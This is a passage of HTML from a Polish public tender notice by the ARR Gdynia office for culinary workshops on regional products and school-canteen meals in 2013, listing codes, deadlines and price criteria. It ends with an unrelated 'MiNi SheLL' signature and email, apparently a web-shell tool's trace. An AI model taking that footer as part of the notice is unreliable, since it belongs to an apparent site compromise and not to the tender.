<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 21: Oddział Terenowy ARR Gdynia; Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących produktów regionalnych i tradycyjnych. Celem warsztatów jest aktywizacja środowisk opiniotwórczych do działań na szczeblu lokalnym nakierowanych na promocję regionalnych produktów i tradycji kulinarnej oraz miejscowych producentów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie częściowe nr 22: Oddział Terenowy ARR Gdynia. Przedmiotem zamówienia jest przeprowadzenie praktycznych warsztatów kulinarnych dla personelu stołówek szkolnych dotyczących sporządzania prawidłowo zbilansowanych posiłków szkolnych. Celem warsztatów jest podniesienie jakości serwowanych posiłków przygotowywanych w stołówkach szkolnych na terenie Gdańska, przekazanie wiedzy 
i doświadczeń w zakresie promowania wartościowych produktów rolno-spożywczych niezbędnych w prawidłowym rozwoju dziecka oraz dążenie do racjonalnego i świadomego odżywiania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com